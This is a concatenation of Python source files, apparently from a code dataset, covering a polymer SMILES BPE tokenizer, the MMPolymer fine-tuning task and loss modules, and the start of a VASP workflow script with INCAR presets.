"vocab_file": "vocab.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/vocab.json",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/vocab.json",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/vocab.json",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/vocab.json",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/vocab.json",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/vocab.json",
},
"merges_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/merges.txt",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/merges.txt",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/merges.txt",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/merges.txt",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/merges.txt",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"roberta-base": 512,
"roberta-large": 512,
"roberta-large-mnli": 512,
"distilroberta-base": 512,
"roberta-base-openai-detector": 512,
"roberta-large-openai-detector": 512,
}
@lru_cache()
def bytes_to_unicode():
"""
    Returns a mapping from utf-8 bytes to unicode strings. We specifically avoid mapping to whitespace/control
    characters that the BPE code chokes on.
The reversible bpe codes work on unicode strings. This means you need a large # of unicode characters in your vocab
if you want to avoid UNKs. When you're at something like a 10B token dataset you end up needing around 5K for
decent coverage. This is a significant percentage of your normal, say, 32K bpe vocab. To avoid that, we want lookup
tables between utf-8 bytes and unicode strings.
"""
bs = (
list(range(ord("!"), ord("~") + 1)) + list(range(ord("¡"), ord("¬") + 1)) + list(range(ord("®"), ord("ÿ") + 1))
)
cs = bs[:]
n = 0
for b in range(2**8):
if b not in bs:
bs.append(b)
cs.append(2**8 + n)
n += 1
cs = [chr(n) for n in cs]
return dict(zip(bs, cs))
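# Editorial example (not part of the original source): the returned map keeps printable byte
# values as themselves and shifts the remaining bytes above U+00FF so every byte becomes a
# printable character, e.g.
#     byte_encoder = bytes_to_unicode()
#     byte_encoder[ord("A")]  # "A"
#     byte_encoder[0x20]      # "\u0120" ("Ġ"), the marker GPT-2 style BPE uses for a space byte
#     byte_encoder[0x0A]      # "\u010A" ("Ċ"), i.e. a newline byte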
def get_pairs(word):
"""
Return set of symbol pairs in a word.
Word is represented as tuple of symbols (symbols being variable-length strings).
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
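# Editorial example (not part of the original source):
#     get_pairs(("C", "l", "C"))  # {("C", "l"), ("l", "C")}
# i.e. every pair of adjacent symbols, which is what the BPE loop below ranks and merges.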
class PolymerSmilesTokenizer(PreTrainedTokenizer):
"""Adapt Roberta Tokenizer to PolymerSmilesTokenzier"""
"""
Original Comments:
Constructs a RoBERTa tokenizer, derived from the GPT-2 tokenizer, using byte-level Byte-Pair-Encoding.
This tokenizer has been trained to treat spaces like parts of the tokens (a bit like sentencepiece) so a word will
be encoded differently whether it is at the beginning of the sentence (without space) or not:
```
#>>> from transformers import RobertaTokenizer
#>>> tokenizer = RobertaTokenizer.from_pretrained("roberta-base")
#>>> tokenizer("Hello world")['input_ids']
    [0, 31414, 232, 2]
#>>> tokenizer(" Hello world")['input_ids']
[0, 20920, 232, 2]
```
You can get around that behavior by passing `add_prefix_space=True` when instantiating this tokenizer or when you
call it on some text, but since the model was not pretrained this way, it might yield a decrease in performance.
<Tip>
When used with `is_split_into_words=True`, this tokenizer will add a space before each word (even the first one).
</Tip>
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
            The beginning of sequence token that was used during pretraining. Can be used as a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
Whether or not to add an initial space to the input. This allows to treat the leading word just as any
other word. (RoBERTa tokenizer detect beginning of words by the preceding space).
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
def __init__(
self,
vocab_file,
merges_file,
errors="replace",
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
add_prefix_space=False,
**kwargs
):
bos_token = AddedToken(bos_token, lstrip=False, rstrip=False) if isinstance(bos_token, str) else bos_token
eos_token = AddedToken(eos_token, lstrip=False, rstrip=False) if isinstance(eos_token, str) else eos_token
sep_token = AddedToken(sep_token, lstrip=False, rstrip=False) if isinstance(sep_token, str) else sep_token
cls_token = AddedToken(cls_token, lstrip=False, rstrip=False) if isinstance(cls_token, str) else cls_token
unk_token = AddedToken(unk_token, lstrip=False, rstrip=False) if isinstance(unk_token, str) else unk_token
pad_token = AddedToken(pad_token, lstrip=False, rstrip=False) if isinstance(pad_token, str) else pad_token
# Mask token behave like a normal word, i.e. include the space before it
mask_token = AddedToken(mask_token, lstrip=True, rstrip=False) if isinstance(mask_token, str) else mask_token
super().__init__(
errors=errors,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
cls_token=cls_token,
pad_token=pad_token,
mask_token=mask_token,
add_prefix_space=add_prefix_space,
**kwargs,
)
with open(vocab_file, encoding="utf-8") as vocab_handle:
self.encoder = json.load(vocab_handle)
self.decoder = {v: k for k, v in self.encoder.items()}
self.errors = errors # how to handle errors in decoding
self.byte_encoder = bytes_to_unicode()
self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
bpe_merges = merges_handle.read().split("\n")[1:-1]
bpe_merges = [tuple(merge.split()) for merge in bpe_merges]
self.bpe_ranks = dict(zip(bpe_merges, range(len(bpe_merges))))
self.cache = {}
self.add_prefix_space = add_prefix_space
# Should have added re.IGNORECASE so BPE merges can happen for capitalized versions of contractions
"""Regex for SMILES"""
smi_regex_pattern = r"(\-?[0-9]+\.?[0-9]*|\[|\]|SELF|Li|Be|Na|Mg|Al|K|Ca|Co|Zn|Ga|Ge|As|Se|Sn|Te|N|O|P|H|I|b|c|n|o|s|p|Br?|Cl?|Fe?|Ni?|Si?|\||\(|\)|\^|=|#|-|\+|\\|\/|@|\*|\.|\%|\$)"
self.pat = re.compile(smi_regex_pattern)
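    # Editorial example (not part of the original source): the SMILES-aware regex above splits
    # a polymer SMILES string into atoms, ring digits, and bond/branch symbols before BPE, e.g.
    #     re.findall(self.pat, "[*]CC(=O)O")
    #     # -> ['[', '*', ']', 'C', 'C', '(', '=', 'O', ')', 'O']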
@property
def vocab_size(self):
return len(self.encoder)
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token)
pairs = get_pairs(word)
if not pairs:
return token
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
self.cache[token] = word
return word
def _tokenize(self, text):
"""Tokenize a string."""
bpe_tokens = []
for token in re.findall(self.pat, text):
token = "".join(
self.byte_encoder[b] for b in token.encode("utf-8")
) # Maps all our bytes to unicode strings, avoiding control tokens of the BPE (spaces in our case)
bpe_tokens.extend(bpe_token for bpe_token in self.bpe(token).split(" "))
return bpe_tokens
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index)
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
text = "".join(tokens)
text = bytearray([self.byte_decoder[c] for c in text]).decode("utf-8", errors=self.errors)
return text
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
merge_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
writer.write("#version: 0.2\n")
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return vocab_file, merge_file
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A RoBERTa sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s></s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not
make use of token type ids, therefore a list of zeros is returned.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
def prepare_for_tokenization(self, text, is_split_into_words=False, **kwargs):
add_prefix_space = kwargs.pop("add_prefix_space", self.add_prefix_space)
if (is_split_into_words or add_prefix_space) and (len(text) > 0 and not text[0].isspace()):
text = " " + text
return (text, kwargs) | 18,013 | Python | .py | 346 | 41.184971 | 190 | 0.605181 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,151 | __init__.py | FanmengWang_MMPolymer/MMPolymer/models/__init__.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from .MMPolymer import MMPolymerModel
from .transformer_encoder_with_pair import TransformerEncoderWithPair | 236 | Python | .py | 4 | 58 | 69 | 0.836207 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,152 | MMPolymer_finetune.py | FanmengWang_MMPolymer/MMPolymer/tasks/MMPolymer_finetune.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import numpy as np
from unicore.data import (
Dictionary,
NestedDictionaryDataset,
LMDBDataset,
AppendTokenDataset,
PrependTokenDataset,
RightPadDataset,
SortDataset,
TokenizeDataset,
RightPadDataset2D,
RawLabelDataset,
RawArrayDataset,
FromNumpyDataset,
)
from MMPolymer.data import (
KeyDataset,
ConformerSampleDataset,
DistanceDataset,
EdgeTypeDataset,
RemoveHydrogenDataset,
AtomTypeDataset,
NormalizeDataset,
CroppingDataset,
RightPadDatasetCoord,
data_utils,
)
from MMPolymer.data.tta_dataset import TTADataset
from unicore.tasks import UnicoreTask, register_task
logger = logging.getLogger(__name__)
@register_task("MMPolymer_finetune")
class MMPolymerFinetuneTask(UnicoreTask):
"""Task for training transformer auto-encoder models."""
@staticmethod
def add_args(parser):
"""Add task-specific arguments to the parser."""
parser.add_argument("data", help="downstream data path")
parser.add_argument("--task-name", type=str, help="downstream task name")
parser.add_argument(
"--classification-head-name",
default="classification",
help="finetune downstream task name",
)
parser.add_argument(
"--num-classes",
default=1,
type=int,
help="finetune downstream task classes numbers",
)
parser.add_argument("--reg", action="store_true", help="regression task")
parser.add_argument("--no-shuffle", action="store_true", help="shuffle data")
parser.add_argument(
"--conf-size",
default=10,
type=int,
help="number of conformers generated with each molecule",
)
parser.add_argument(
"--remove-hydrogen",
action="store_true",
help="remove hydrogen atoms",
)
parser.add_argument(
"--remove-polar-hydrogen",
action="store_true",
help="remove polar hydrogen atoms",
)
parser.add_argument(
"--max-atoms",
type=int,
default=256,
help="selected maximum number of atoms in a molecule",
)
parser.add_argument(
"--dict-name",
default="dict.txt",
help="dictionary file",
)
parser.add_argument(
"--only-polar",
default=1,
type=int,
help="1: only reserve polar hydrogen; 0: no hydrogen; -1: all hydrogen ",
)
def __init__(self, args, dictionary):
super().__init__(args)
self.dictionary = dictionary
self.seed = args.seed
# add mask token
self.mask_idx = dictionary.add_symbol("[MASK]", is_special=True)
if self.args.only_polar > 0:
self.args.remove_polar_hydrogen = True
elif self.args.only_polar < 0:
self.args.remove_polar_hydrogen = False
else:
self.args.remove_hydrogen = True
@classmethod
def setup_task(cls, args, **kwargs):
dictionary = Dictionary.load(args.dict_name)
logger.info("dictionary: {} types".format(len(dictionary)))
return cls(args, dictionary)
def load_dataset(self, split, **kwargs):
"""Load a given dataset split.
Args:
            split (str): name of the data split (e.g., train)
"""
split_path = os.path.join(self.args.data, self.args.task_name, split + ".lmdb")
dataset = LMDBDataset(split_path)
if split == "train":
tgt_dataset = KeyDataset(dataset, "target")
smi_dataset = KeyDataset(dataset, "smi")
sample_dataset = ConformerSampleDataset(
dataset, self.args.seed, "atoms", "coordinates"
)
dataset = AtomTypeDataset(dataset, sample_dataset)
else:
dataset = TTADataset(
dataset, self.args.seed, "atoms", "coordinates", self.args.conf_size
)
dataset = AtomTypeDataset(dataset, dataset)
tgt_dataset = KeyDataset(dataset, "target")
smi_dataset = KeyDataset(dataset, "smi")
dataset = RemoveHydrogenDataset(
dataset,
"atoms",
"coordinates",
self.args.remove_hydrogen,
self.args.remove_polar_hydrogen,
)
dataset = CroppingDataset(
dataset, self.seed, "atoms", "coordinates", self.args.max_atoms
)
dataset = NormalizeDataset(dataset, "coordinates", normalize_coord=True)
src_dataset = KeyDataset(dataset, "atoms")
src_dataset = TokenizeDataset(
src_dataset, self.dictionary, max_seq_len=self.args.max_seq_len
)
coord_dataset = KeyDataset(dataset, "coordinates")
def PrependAndAppend(dataset, pre_token, app_token):
dataset = PrependTokenDataset(dataset, pre_token)
return AppendTokenDataset(dataset, app_token)
src_dataset = PrependAndAppend(
src_dataset, self.dictionary.bos(), self.dictionary.eos()
)
edge_type = EdgeTypeDataset(src_dataset, len(self.dictionary))
coord_dataset = FromNumpyDataset(coord_dataset)
coord_dataset = PrependAndAppend(coord_dataset, 0.0, 0.0)
distance_dataset = DistanceDataset(coord_dataset)
input_ids_dataset = KeyDataset(dataset, "input_ids")
attention_mask_dataset = KeyDataset(dataset, "attention_mask")
nest_dataset = NestedDictionaryDataset(
{
"net_input": {
"src_tokens": RightPadDataset(
src_dataset,
pad_idx=self.dictionary.pad(),
),
"src_coord": RightPadDatasetCoord(
coord_dataset,
pad_idx=0,
),
"src_distance": RightPadDataset2D(
distance_dataset,
pad_idx=0,
),
"src_edge_type": RightPadDataset2D(
edge_type,
pad_idx=0,
),
"src_input_ids": input_ids_dataset,
"src_attention_mask": attention_mask_dataset,
},
"target": {
"finetune_target": RawLabelDataset(tgt_dataset),
},
"smi_name": RawArrayDataset(smi_dataset),
},
)
if not self.args.no_shuffle and split == "train":
with data_utils.numpy_seed(self.args.seed):
shuffle = np.random.permutation(len(src_dataset))
self.datasets[split] = SortDataset(
nest_dataset,
sort_order=[shuffle],
)
else:
self.datasets[split] = nest_dataset
def build_model(self, args):
from unicore import models
model = models.build_model(args, self)
return model
| 7,300 | Python | .py | 195 | 26.558974 | 87 | 0.577483 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,153 | __init__.py | FanmengWang_MMPolymer/MMPolymer/tasks/__init__.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from pathlib import Path
import importlib
# automatically import any Python files in the tasks/ directory
for file in sorted(Path(__file__).parent.glob("*.py")):
if not file.name.startswith("_"):
importlib.import_module("MMPolymer.tasks." + file.name[:-3])
| 404 | Python | .py | 8 | 47.75 | 69 | 0.746193 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,154 | MMPolymer_finetune.py | FanmengWang_MMPolymer/MMPolymer/losses/MMPolymer_finetune.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import math
import torch
import torch.nn.functional as F
import pandas as pd
import numpy as np
from unicore import metrics
from unicore.losses import UnicoreLoss, register_loss
from sklearn.metrics import r2_score
@register_loss("MMPolymer_finetune")
class MMPolymerFinetuneLoss(UnicoreLoss):
def __init__(self, task):
super().__init__(task)
def forward(self, model, sample, reduce=True):
net_output = model(
**sample["net_input"],
features_only=True,
classification_head_name=self.args.classification_head_name,
)
reg_output = net_output[0]
loss = self.compute_loss(model, reg_output, sample, reduce=reduce)
sample_size = sample["target"]["finetune_target"].size(0)
if not self.training:
logging_output = {
"loss": loss.data,
"predict": reg_output.view(-1, self.args.num_classes).data,
"target": sample["target"]["finetune_target"]
.view(-1, self.args.num_classes)
.data,
"smi_name": sample["smi_name"],
"sample_size": sample_size,
"num_task": self.args.num_classes,
"conf_size": self.args.conf_size,
"bsz": sample["target"]["finetune_target"].size(0),
}
else:
logging_output = {
"loss": loss.data,
"sample_size": sample_size,
"bsz": sample["target"]["finetune_target"].size(0),
}
return loss, sample_size, logging_output
def compute_loss(self, model, net_output, sample, reduce=True):
predicts = net_output.view(-1, self.args.num_classes).float()
targets = (
sample["target"]["finetune_target"].view(-1, self.args.num_classes).float()
)
loss = F.mse_loss(
predicts,
targets,
reduction="sum" if reduce else "none",
)
return loss
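    # Editorial note (not part of the original source): because compute_loss uses
    # reduction="sum", the scalar reported by reduce_metrics below is
    #     loss = sum_over_batch((pred - target) ** 2) / sample_size / log(2)
    # i.e. the mean squared error per sample divided by log(2), matching the
    # `loss_sum / sample_size / math.log(2)` expression in reduce_metrics.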
@staticmethod
def reduce_metrics(logging_outputs, split="valid") -> None:
"""Aggregate logging outputs from data parallel training."""
loss_sum = sum(log.get("loss", 0) for log in logging_outputs)
sample_size = sum(log.get("sample_size", 0) for log in logging_outputs)
metrics.log_scalar(
"loss", loss_sum / sample_size / math.log(2), sample_size, round=3
)
if "valid" in split or "test" in split:
predicts = torch.cat([log.get("predict") for log in logging_outputs], dim=0)
if predicts.size(-1) == 1:
targets = torch.cat(
[log.get("target", 0) for log in logging_outputs], dim=0
)
smi_list = [
item for log in logging_outputs for item in log.get("smi_name")
]
df = pd.DataFrame(
{
"predict": predicts.view(-1).cpu(),
"target": targets.view(-1).cpu(),
"smi": smi_list,
}
)
mae = np.abs(df["predict"] - df["target"]).mean()
mse = ((df["predict"] - df["target"]) ** 2).mean()
df = df.groupby("smi").mean()
agg_mae = np.abs(df["predict"] - df["target"]).mean()
agg_mse = ((df["predict"] - df["target"]) ** 2).mean()
agg_r2 = r2_score(df["target"], df["predict"])
metrics.log_scalar(f"{split}_mae", mae, sample_size, round=3)
metrics.log_scalar(f"{split}_mse", mse, sample_size, round=3)
metrics.log_scalar(f"{split}_agg_mae", agg_mae, sample_size, round=3)
metrics.log_scalar(f"{split}_agg_mse", agg_mse, sample_size, round=3)
metrics.log_scalar(
f"{split}_agg_rmse", np.sqrt(agg_mse), sample_size, round=4
)
metrics.log_scalar(
f"{split}_agg_r2", agg_r2, sample_size, round=4
)
metrics.log_scalar(
f"{split}_agg_reg", agg_r2 - np.sqrt(agg_mse), sample_size, round=4
)
@staticmethod
def logging_outputs_can_be_summed(is_train) -> bool:
"""
Whether the logging outputs returned by `forward` can be summed
across workers prior to calling `reduce_metrics`. Setting this
        to True will improve distributed training speed.
"""
return is_train | 4,745 | Python | .py | 105 | 32.266667 | 88 | 0.54031 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,155 | __init__.py | FanmengWang_MMPolymer/MMPolymer/losses/__init__.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from pathlib import Path
import importlib
# automatically import any Python files in the losses/ directory
for file in sorted(Path(__file__).parent.glob("*.py")):
if not file.name.startswith("_"):
importlib.import_module("MMPolymer.losses." + file.name[:-3])
| 405 | Python | .py | 8 | 47.875 | 69 | 0.746835 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,156 | VaspTool.py | aboys-cb_VaspTool/VaspTool.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/5/9 22:40
# @Author : 兵
# @email : [email protected]
import logging
import sys
from pymatgen.util.typing import Tuple3Ints, Vector3D
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
    stream=sys.stdout  # send log output to sys.stdout
)
__version__ = "1.5.0"
logging.info(f"VaspTool-{__version__}")
logging.info(f"开始初始化,请稍等...")
from functools import cached_property, partial
import matplotlib
matplotlib.use('Agg')
from ruamel.yaml.comments import CommentedMap
import abc
import argparse
import glob
import re
import shutil
from pathlib import Path
import numpy as np
import json
import traceback
import pandas as pd
import datetime
import os
import subprocess
from typing import *
from tqdm import tqdm
import math
from monty.os import cd
from monty.dev import requires
from monty.io import zopen
from monty.json import MontyEncoder, MontyDecoder
from monty.serialization import loadfn
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.core import Structure, Lattice, SETTINGS
from pymatgen.io.vasp.inputs import Incar, Poscar, Kpoints, VaspInput, Potcar, PotcarSingle
from pymatgen.io.vasp.outputs import Vasprun, BSVasprun, Outcar, Eigenval, Wavecar, Locpot
from pymatgen.io.lobster import Lobsterin, Lobsterout, Icohplist
from pymatgen.electronic_structure.core import Spin, Orbital
from pymatgen.electronic_structure.dos import CompleteDos
from pymatgen.electronic_structure.plotter import BSPlotter, DosPlotter, BSDOSPlotter
from pymatgen.symmetry.bandstructure import HighSymmKpath
from pymatgen.command_line.bader_caller import bader_analysis_from_path
from pymatgen.analysis.solar import slme
from pymatgen.analysis.eos import EOS
from pymatgen.io.ase import AseAtomsAdaptor
try:
from phonopy import Phonopy
from phonopy.file_IO import write_FORCE_CONSTANTS, write_disp_yaml, write_FORCE_SETS
from phonopy.interface.calculator import get_default_physical_units
from phonopy.interface.phonopy_yaml import PhonopyYaml
from phonopy.phonon.band_structure import get_band_qpoints_and_path_connections
from pymatgen.io import phonopy
except:
Phonopy = None
try:
from ase.io import read as ase_read
from ase.io import write as ase_write
except:
ase_write = None
ase_read = None
from matplotlib import pyplot as plt
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
if os.path.exists("./config.yaml"):
conf_path = "./config.yaml"
elif Path(__file__).with_name("config.yaml").exists():
conf_path = Path(__file__).with_name("config.yaml").as_posix()
else:
logging.error("在运行路径或者VaspTool.py路径下必须要有一个config.yaml!")
exit()
logging.info(f"使用配置文件:{conf_path}")
config = loadfn(conf_path)
config: CommentedMap
SETTINGS["PMG_DEFAULT_FUNCTIONAL"] = r"PBE_54"
SETTINGS["PMG_VASP_PSP_DIR"] = os.path.expanduser(os.path.expandvars(config["SETTING"]["PMG_VASP_PSP_DIR"]))
plt.rc('font', family='Times New Roman')
warnings.filterwarnings("ignore", module="pymatgen")
PotcarSingle.functional_dir["PBE_54"] = ""
FUNCTION_TYPE = ["pbe", "pbesol", "hse", "scan", "r2scan", "mbj", "gw", "bse"]
KPOINTS_TYPE = Union[int, tuple, list]
setting = config.get("SETTING", {})
potcar_config = config.get("POTCAR", {}).get("PBE54")
potcar_gw_config = config.get("POTCAR", {}).get("GW")
# step_base_incar holds the baseline PBE settings for each step; functional-specific overrides live in function_base_incar.
step_base_incar = {
"sr": {
"add": {
"LWAVE": False, "LCHARG": False, "NSW": 500, "ISIF": 3, "IBRION": 2, "ALGO": "Normal"
},
"remove": []
},
"scf": {
"add": {
"LWAVE": True, "LCHARG": True, "NSW": 0, "IBRION": -1
},
"remove": []
},
"dos": {
"add": {
"ISTART": 1, "ISMEAR": 0, "ICHARG": 11, "NSW": 0, "IBRION": -1, "LORBIT": 11,
"NEDOS": 3000, "LWAVE": False, "LCHARG": False
},
"remove": []
},
"band": {
"add": {
"ISTART": 1, "ICHARG": 11, "NSW": 0, "IBRION": -1, "LORBIT": 11, "LWAVE": False, "LCHARG": False
},
"remove": []
},
"optic": {
"add": {
"ISTART": 1, "NSW": 0, "LWAVE": False,
"LCHARG": False, "LOPTICS": True, "NBANDS": 96,
"NEDOS": 2000, "CSHIF": 0.100, "IBRION": 8
},
"remove": []
},
"elastic": {
"add": {
"ISTART": 0, "ISIF": 3, "IBRION": 6, "LWAVE": False, "LCHARG": False,
"PREC": "Accurate", "ADDGRID": True, "LREAL": False, "NSW": 1,
"NFREE": 2
},
"remove": ["NPAR", "NCORE"]
},
"dielectric": {
"add": {
"ISTART": 1, "SIGMA": 0.05, "LEPSILON": True, "LPEAD": True, "IBRION": 8, "LWAVE": False, "LCHARG": False
},
"remove": ["NPAR", "NCORE"]
},
"aimd": {
"add": {
"ALGO": "Normal", "IBRION": 0, "MDALGO": 2, "ISYM": 0,
"POTIM": 1, "NSW": 3000, "TEBEG": 300, "TEEND": 300,
"SMASS": 1, "LREAL": "Auto", "ISIF": 2, "ADDGRID": True
},
"remove": []
},
}
# Supplementary settings for the non-PBE functionals.
function_base_incar = {
"hse": {
"base": {
"add": {
"HFSCREEN": 0.2, "AEXX": 0.25, "LHFCALC": True, "PRECFOCK": "N"
},
"remove": []
},
"steps": {
"scf": {
"ISTART": 1, "ALGO": "Damped", "ICHARG": 0
},
"dos": {"ALGO": "Normal", "ICHARG": 1,
},
"band": {
"ALGO": "Normal",
"ICHARG": 1,
},
"optic": {"ICHARG": 2, "LREAL": False, "ALGO": "Normal", "IBRION": -1}
}
},
"pbesol": {
"base": {
"add": {"GGA": "PS"},
"remove": []
},
"steps": {
}
},
"scan": {
"base": {
"add": {"METAGGA": "SCAN", "ALGO": "ALL", "LASPH": True,
"LUSE_VDW": True, "BPARAM": 15.7, "CPARAM": 0.0093},
"remove": ["GGA"]
},
"steps": {
